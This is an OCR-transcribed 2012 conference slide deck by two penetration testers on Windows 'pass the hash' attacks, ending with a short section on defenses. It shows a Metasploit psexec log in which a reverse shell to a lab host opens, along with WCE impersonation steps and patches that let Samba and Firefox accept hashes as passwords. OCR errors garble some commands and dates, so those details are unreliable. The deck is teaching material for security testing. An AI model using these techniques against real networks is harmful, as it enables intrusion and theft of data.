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Access Aii your Data 
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Do You Know Who I Am? 


Alva 'Skip' Duckwall 

• Full Scope Pen-Tester for Northrop Grumman 

• GSE, OSCP, CISSP, CISA, RHCE, among others 

• 19 Years Working with Linux 


Chris Campbell 

• Full Scope Pen-Tester for Northrop Grumman 

• MSIA, OSCP, CISSP, CISA, MCSE, among others 

• Former Army Signal Officer 



Shameless Plug 

Patches available from: 
http://code.google.eom/p/passing-the-hash/ 

Also Chris and I will be blogging about how to 
use the various tools in the coming weeks: 

http://passing-the-hash.blogspot.com/ 


Twitter @passingthehash @obscuresec (chris) 



A Little History 


In 1997 Paul Ashton posted the theory about the first "Pass 
the Hash" attack to NTBugTraq against the Lan Manager 
protocol 


The result? 


A modified Samba client that accepts LM hashes instead of 
a password to access a remote file share. 



Your Data is Your Kingdom 

Business Relies on Data 


• Email 

• Files on a Share 

• Intranet Applications (Sharepoint) 

• Databases 

What would happen if somebody else had control 
of your data? 



Typical Day at the Microsoft Office 


A Regular User's Day: 

• Login 

• Check Email 

• Visit the Intranet 

A Sysad's day - All of the above plus: 

• Log into a Database 

• Manage Servers / Services 


All of This and the Password Only Gets Typed Once 



The Windows Single Sign On 

Once A User Logs In, Their Credentials are 
Cached Locally and Reused by the OS on 
the User's Behalf 


User Prompted Rarely After Initial Login 
Password Hashes are Cached Locally 
Plaintext as Well (Digest Auth) 



Windows Password Hashes 


Passwords Hashed 2 Different Ways: 

• LM (Lan Manager) Hash 

• NTLM Hash 


Modern versions of Windows don't save LM 
hashes, however they are still calculated and 
stored in memory if the password is 14 
characters or less, even if they aren't saved... 



Logging In 


When a User Logs in, a security token is 
created containing: 

• Security Identifiers (SID) for the user 

• SIDs for all groups the user is a member of 

• Default ACLs (if no other ACLs apply) 

• Per User Audit Settings 

• Impersonation Level 



Impersonation 

Tokens have 4 Different Security Levels: 

• Anonymous 

• Identification 

• Impersonation 

• Delegation 

Interactive logins (Windows Console) -> delegation tokens 
Non-interactive (Network Login) -> impersonation tokens 

"Incognito" tool / module allows for a lot of post exploitation 
fun with tokens allowing a malicious user to steal other 
identities of people logged into a server... 



Windows Authentication Methods 


Kerberos 

• Uses Tickets 

• Tickets can be reused for iower overhead 
NTLM 

• Chaiienge Response Protocoi 

• Every Transaction Authenticated, high overhead 

Digest Authentication 

• Hashed Password (Usuaiiy with MD5) 

• Requires Piaintext Password to Be Stored 



Windows Authentication Methods (contd) 

Smart Cards 

• Two Factor Authentication, Bolted onto Kerberos 

• Only for Interactive (Console) Sessions 

• Hashes Still Stored on the Back End 

Keyfobs, etc (SecurlD) 

• Two Factor Authentication 

• Only used for Interactive Logons 

• Radius (or Radius-like) Used on the Back End - Gives 
Thumbs Up/Down on 2nd Factor 

• Password Hashes Used on the Back End 



Kerberos vs. NTLM 


Kerberos 

• Default 

• Both Client/server Must Be in the Domain 

• Reliance on DNS 

NTLM 

• Used if Client/server not in the Domain 

• Used if Addressed by IP 



Services that Can Use NTLM 


Web Services 

o Sharepoint 

o Custom Web Apps (.net Based) 

Exchange 

O MAPI 
o IMAP/POPS 
o SMTP 

Things that Can't Join the Domain 

o Appliances 

o Printers / Copiers / Digital Senders 



Difficult to Eliminate NTLM 


Only Recently Implemented 

• Requires Windows 7 for All Clients 

• Domain Must be at 2008R2 Functional Level 

Probably Will Break Things 

• Copiers / Printers / Digital Senders 

• Web Apps/ Appliances 

• Internet / Customer Facing Applications 

• Anything Not In the Domain 



Passing the Hash 


Windows Authentication Protocols Operate on 
Password Hashes 


• Kerberos Use the NT Hash as Encryption Keys 

• NTLM Uses Password Hashes as Part of the Challenge 
Response 

o Password Hash along with nonce Hashed to 
Confirm Knowledge of the Password 
o Excellent Detailed Descriptions of the Process 
available at the Davenport Website 



Knocked Over The DC, Got the Hashes, 
Now What? 

Maybe Crack the Passwords? 

• Works for Weak or Easily Guessed 
Passwords 

• Can Look Impressive if Wildly Successful 
(>50%) 

• Might not be allowed by the Rules of 
Engagement 

• Lacks C-Level "Wow" Factor 



Perhaps a Traditional Pass The 
Hash Attack? 


msf > search smb hash 
Matching Modules 


Name Disclosure Date Rank Description 


auxiliary/admin/oracle/ora_ntlin_stealer 2GG9-G4-G7 GG;GG:GG UTC normal Oracle SMB Relay Code Execution 
auxiliary/admin/smb/upload_file normal SMB File Upload Utility 

auxiliary/server/capture/smb normal Authentication Capture; SMB 

auxiliary/spoof/nbns/nbns_response normal NetBIOS Name Service Spooler 

exploit/windows/smb/psexec 1999-Gl-Gl GG;GG:GG LTC manual Microsoft Windows Authenticated User Code Execution 









Super Sexy for Pentesters... 


St exploit (psexec) > exploit 

[♦] Started reverse handler on 172.16.1.200:4444 
[*] Connecting to the server... 

I*] Authenticating to 172.16.1.1:445|demo as user 'administrator'... 

;*] Uploading payload... 

;*] Created \asOYOknq.exe... 

;*] Binding to 367abb81-9844-35fl-ad32-98f038001O03:2.0@ncacn_np:172.16.1.1[\svcctl] ... 
i*] Bound to 367abb81-9844-35fl-ad32-98f038001003:2.0(ancacn_np:172.16.1.1[\svcctl] ... 

!*] Obtaining a service manager handle... 

[*] Creating a new service (UAqjbGny - "MwDHMrV")... 

[*] Closing service handle... 

[*] Opening service... 

[♦] Starting the service... 

[*] Removing the service... 

!*] Closing service handle... 

!*] Deleting \asQYOknq.exe... 

;*] Sending stage (240 bytes) to 172.16.1.1 

!*] Command shell session 1 opened (172.16.1.200:4444 -> 172.16.1.1:56642) at 2012-07-13 01:10:1 
licrosoft Windows [Version 6.0.6002] 

opyright (c) 2006 Microsoft Corporation. All rights reserved. 

:\Windows\system32>| 



For C-Level folks... Not so Much 


Microsoft Windows [Version 6.0.6002] 

Copyright (c) 2006 Microsoft Corporation. All rights reserved. 

C:\Windows\system32>whoami 
wlioami 

fit authority\system 


“I don’t know anybody named NT System in my 

company...” 




Boring! 


"You logged into the Domain Controller, but you 
can't read my email. We're secure, right?" 


Remember, the Crown Jewels of the Network is 
the Data. Nobody gets excited unless that's 
put at risk. 



Slightly More Interesting PTH 

Access File Shares 

• Find all sorts of Interesting Things 

o Personally Identifiable Information 
o Database Dumps 
o Saved Email 
o Inventory Information 
o Design Specs 
o etc, etc, etc 

• Accessing Proprietary Information Starts 
Getting Some Attention 

• We can use a Modified Samba Client (more 
later) 



Accessing Data 


Many Windows Applications Pass The Hash to 
Access Data, Why Can't We? 



Demo Domain Assumptions 

• Sitting Inside the Domain 

• Already Dumped the Hashes (Post 
Exploitation) 

• We care about 3 people 
o Alice 

o Bob 
CEO 


O 



Our Windows Attack Platform 

Windows 7 - Fully Patched 
Not a Member of the Domain 
No Antivirus 

No Host-Based Intrusion Detection 
No Host-Based Intrusion Prevention 

Latest Version of the Windows Credential 
Editor by Hernan Ochoa 

Client Software We Want to Use 



WCE Overview 


Written by Hernan Ochoa of Amplia Security 

• Successor to the Pass The Hash Toolkit 

• Capable of examining memory to list hashes for all 
logged in users (-I) 

• Can Be Used to Inject or Dump Kerberos Tickets 
(-k/-K) 

• Can Be Used to Change the Credentials of the currently 
logged in session (-s ) 

• Can Be Used to Launch a Program with Different 
Credentials in a New Session (-c ) 



Why Not CMD.EXE? 


Running WCE with both '-s' and '-o' allows us to 
create a new process running as an arbitrary 
domain user with their hash. 

Using cmd.exe as the process, any command 
executed from this DOS box will be running 
as that user, even if the local computer isn't 


on the domainl 



Or explorer.exe 


Using Task Manager, We Kill Explorer.exe and 
restart it using WCE. 

This allows us to Browse File Shares Using 
Explorer as the User. Also, any programs 
started with the "Start Menu" automatically 
get launched as that user as well... 



Now What? 


Launch IE at the Local Sharepoint Site. 

Internet Explorer might need to be configured 
to automatically pass credentials: 


1. IE config: security -> custom level for the zone -> 
automatic logon only in intranet zone 

2. Add Sharepoint to the Local Intranets Group 



How About Outlook? 


Use Outlook to Access Email/Calendar for Our 
Impersonated User. 

1. Enable profiles in the Mail Control Panel: 
Control panel -> mail -> always prompt for 
profiles 

2. Create a Profile for Each User 



Access File Shares 


We can either use the Explorer.exe trick or use 
net commands to mount / browse file shares. 


Note: The Vsavecred' doesn't work with 
hashes. Apparently it only saves a plaintext 
password... who knew? 



MS SQL 


Simply launch the MSSQL client and point it at 
a database to log in, assuming it uses 
Windows Authentication... 

Access or Monkey with the Data, depending on 
the ROE of course... 



Sysadmin Tasks 

Simply run from the command line: 

• PSExec (Sysinternals) 

• WMI 

• Powershell 

o new feature in Win8, Web powershell 

• WinRM (if enabled) 

• Active Directory Users and Computers 

• Computer Management 



Windows Demo 


Pictures worth a thousand words... 



Demo Gotcha's 


Outlook 2007 inconsistent 

• One demo environment worked fine, another 
didn't 

• Outlook 2003 worked perfectly ;-) 

ADUC couldn't assign passwords, but could 
change group membership, create computer 
accounts 



Demo Gotcha's (contd) 

Admod password weirdness 

• Short random passwords fail sporadically 

• Long random passwords work consistently 

Can't open Multiple GUI apps as multiple users 
at the same time (IE/Outlook) 

• Probably just spawns another thread rather 
than another process 



It Works, But... 


Obviously Windows behaves strangely if you 
do this... expect other magical failures or 
side effects! 



What About Linux? 

Meh, I'm a Linux guy... 

How about we do all of that with Linux instead? 



The Foofus Patch 


The previously mentioned modified version of 
Samba was patched by JMK of Foofus.net. 

• Allows Us to Set an Environmental Variable 
with the password hash we want to 
substitute 

• Substitutes the hash in all the appropriate 
places for NTLM authentication 



An Additional Technique We Added 

Instead of the environmental variable, the hash 
can be specified as the password as long as 
it's in one of 2 forms: 

• LM:NT (65 chars) 

• LN:NT::: (68 chars, thanks JMK for the 
suggestion) 

• If the password is 65 or 68 characters long, 
substitute the hash 



Benefits of the New Technique 

Easier to use in scripts - just change the 
password 


Allows us to pass hashes in GUI programs 
without the need to kill and reset 
environmental variables 



Anatomy of a Patch 

Find where the application hashes the 
password in the source code 

Check to see if the password is 65 or 68 
characters 

If so, convert the 32-byte NT Hash into a 16- 
byte array by converting 2 hex nibbles into a 
byte, then substitute 



Samba - Just for Shares, Right? 

• Libraries for Interfacing with MS DCE/RPC 

• Utilities for Managing Windows Domains / Users 


Multiple 3rd party programs link in with Samba for access 
to MS DCE/RPC. Patching Samba will patch 
downstream programs... 


We are releasing "The Pass the Hash Rosetta Stone". It's 
a list of Samba commands and their Corresponding 
Windows 'Net' commands for common tasks. 



utilities That Link with Samba 

Winexe 

• PSExec Clone (32/64 bit) 

WMI 

• Run basic WMI queries from Linux 

• Includes blind command execution via WMI 

Openchange 

• Open-source framework to interface with 
Exchange from Linux 



What About Firefox? 


By default Firefox tries to query the Local OS 
for NTLM creds if enabled 

Or 

Use Firefox's built-in implementation based on 
Davenport 

o Patched Firefox's NTLM implementation with the 
65/68 character Hash Patch 
o Enabled in "about:config" 

network.auth.force-generic-ntim -> true 


O 



What About MSSQL? 


FreeTDS 

• Provides Libraries to Interface with Sybase / 
MS SQL 

• NTLM Authentication Code Based on 
Davenport (Guess what we already have 
code for?) 

• Combine with SQSH (SQL Shell) to Gain 
Interactive Access to Databases for Linux 



Linux Demo 



Defenses 

Try to Eliminate the Use of NTLM 

• Difficult To Do 

• Requires 2008R2 Domain Functional Level 

• All Clients Need to Be Windows 7 

• Will Break Things That Can't Do Kerberos 

o Printers / Copiers / Digital Senders 
o Appliances 
o Potentially NAS Devices 


Of Course, a Defense in Depth Approach to 
Preventing Compromise of the DC Works Too! 



Kerberos Is Safe, Right? 


Kerberos Uses NT Hashes for Encrypting 
Tickets to Principals 

• Discussed in More Detail in the Whitepaper 

• Short Version: Compromising the Encryption 
Keys is Still Very Bad(tm)! 



Quick Recap 


Windows + WCE + Hashes = Access To Data 

• Native Windows Toois Work Albeit Oddiy at Times 

• Definitely Not Exactly How Windows Wants to Work 

Linux + PTH Tools + Hashes = Access To Data 

• Open Source Tools FTW! 

• Exchange, MS SQL, Sharepoint, File shares 



Shouts! 


Aaron, Pete, Mike, Jeff, Brian 
jcran. Will, Damien 



Questions? 



Help Us Get Better! 


Please Fill Out The Speaker Surveys! 



